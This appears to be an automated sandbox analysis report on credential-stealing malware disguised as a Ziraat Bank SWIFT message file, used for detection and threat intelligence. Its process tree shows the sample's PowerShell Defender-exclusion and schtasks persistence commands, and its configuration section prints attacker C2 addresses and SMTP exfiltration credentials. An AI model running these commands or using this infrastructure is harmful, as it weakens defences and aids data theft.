Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Overview

General Information

Sample name:	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Analysis ID:	1562900
MD5:	7c36f1554bb662abddb2fafb5db3037d
SHA1:	4d2b146919805242a1699139d2937bae4fddfd4b
SHA256:	5f93d1ba8286162e4e7ebe907745b186d2301534fd8b39a84f129f3857f16c30
Tags:	exegeoRedLineStealerTURZiraatBankuser-abuse_ch
Infos:

Detection

AgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected Phoenix Stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to log keystrokes (.Net Source)

Drops large PE files

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe" MD5: 7C36F1554BB662ABDDB2FAFB5DB3037D)

powershell.exe (PID: 4448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7064 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe" MD5: 7C36F1554BB662ABDDB2FAFB5DB3037D)

XClient.exe (PID: 2604 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: 1C5CF825E29B63A62C3C8B1589D51A1E)

powershell.exe (PID: 7216 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7236 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:07 /du 23:59 /sc daily /ri 1 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

apihost.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 323EA75CFDE79456B79629AD4F7D8578)

build.exe (PID: 6508 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 1ED2ECAE05AAA1C505136F5252287CC7)

YkxAHNcqEmoeLS.exe (PID: 892 cmdline: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe MD5: 7C36F1554BB662ABDDB2FAFB5DB3037D)

schtasks.exe (PID: 4012 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp9D06.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

YkxAHNcqEmoeLS.exe (PID: 5852 cmdline: "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe" MD5: 7C36F1554BB662ABDDB2FAFB5DB3037D)

WerFault.exe (PID: 3620 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 1016 MD5: C31336C1EFC2CCB44B4326EA793040F2)

XClient.exe (PID: 1412 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 1C5CF825E29B63A62C3C8B1589D51A1E)

XClient.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 1C5CF825E29B63A62C3C8B1589D51A1E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["212.162.149.53"], "Port": 7071, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Threatname: RedLine

{"C2 url": ["212.162.149.53:36014"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x867f:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\build.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000000.2119570575.00000000008C2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000000.2119570575.00000000008C2000.00000002.00000001.01000000.0000000C.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x88ed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x898a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8a9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x847f:$cnc4: POST / HTTP/1.1
00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000008.00000002.2942525040.000000001D380000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000000.2120832413.0000000000592000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2130198719.00000000041E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.2144967005.0000000003C61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2130198719.0000000004164000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2130198719.000000000423E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.2503972444.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000E.00000002.2503972444.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4ae31:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x55075:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5f2d1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4aece:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x55112:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5f36e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4afe3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x55227:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5f483:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4a9c3:$cnc4: POST / HTTP/1.1 0x54c07:$cnc4: POST / HTTP/1.1 0x5ee63:$cnc4: POST / HTTP/1.1
00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2148223816.0000000006F90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1541d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1491b:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c29:$a4: \Orbitum\User Data\Default\Login Data 0x15a21:$a5: \Kometa\User Data\Default\Login Data
00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2f9f5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2fa92:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2fba7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2f587:$cnc4: POST / HTTP/1.1
00000007.00000002.2129069738.0000000003161000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000007.00000002.2129069738.0000000003161000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4aee5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x55129:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5f385:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4af82:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x551c6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5f422:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4b097:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x552db:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5f537:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4aa77:$cnc4: POST / HTTP/1.1 0x54cbb:$cnc4: POST / HTTP/1.1 0x5ef17:$cnc4: POST / HTTP/1.1
00000008.00000002.2652391836.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.4577783321.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe PID: 5600	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe PID: 1436	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe PID: 1436	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: XClient.exe PID: 2604	JoeSecurity_PhoenixStealer	Yara detected Phoenix Stealer	Joe Security
Process Memory Space: XClient.exe PID: 2604	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: XClient.exe PID: 2604	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: XClient.exe PID: 2604	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: XClient.exe PID: 2604	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: XClient.exe PID: 2604	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: XClient.exe PID: 2604	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: XClient.exe PID: 2604	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x30b35:$a20: get_LastAccessed 0x34319:$a30: set_GuidMasterKey 0x317f6:$a31: set_username 0x6f4dec:$a32: set_version 0x6f3e0e:$a33: get_Clipboard 0x6f3e55:$a34: get_Keyboard 0x32d9d:$a35: get_ShiftKeyDown 0x6f5007:$a35: get_ShiftKeyDown 0x32dae:$a36: get_AltKeyDown 0x310c3:$a37: get_Password 0x6f3e7b:$a37: get_Password 0x33737:$a39: get_DefaultCredentials
Process Memory Space: XClient.exe PID: 2604	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6f3eb1:$a1: get_encryptedPassword 0x6f41de:$a2: get_encryptedUsername 0x6f3c52:$a3: get_timePasswordChanged 0x6f3d73:$a4: get_passwordField 0x6f3ec7:$a5: set_encryptedPassword 0x6f5839:$a7: get_logins 0x6f54ea:$a8: GetOutlookPasswords 0x6f52c8:$a9: StartKeylogger 0x6f5789:$a10: KeyLoggerEventArgs 0x6f5325:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: build.exe PID: 6508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build.exe PID: 6508	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: YkxAHNcqEmoeLS.exe PID: 892	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: YkxAHNcqEmoeLS.exe PID: 5852	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: apihost.exe PID: 7820	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 44 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.0.XClient.exe.8c0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
8.0.XClient.exe.8c0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x867f:$cnc4: POST / HTTP/1.1
0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.6f90000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.XClient.exe.2ce4f08.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
8.2.XClient.exe.2ce4f08.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ced:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x687f:$cnc4: POST / HTTP/1.1
8.2.XClient.exe.1d020000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.XClient.exe.1d020000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.XClient.exe.1d020000.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a7b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33aed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b77:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ce5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33e0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ced:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x687f:$cnc4: POST / HTTP/1.1
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ced:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x687f:$cnc4: POST / HTTP/1.1
14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
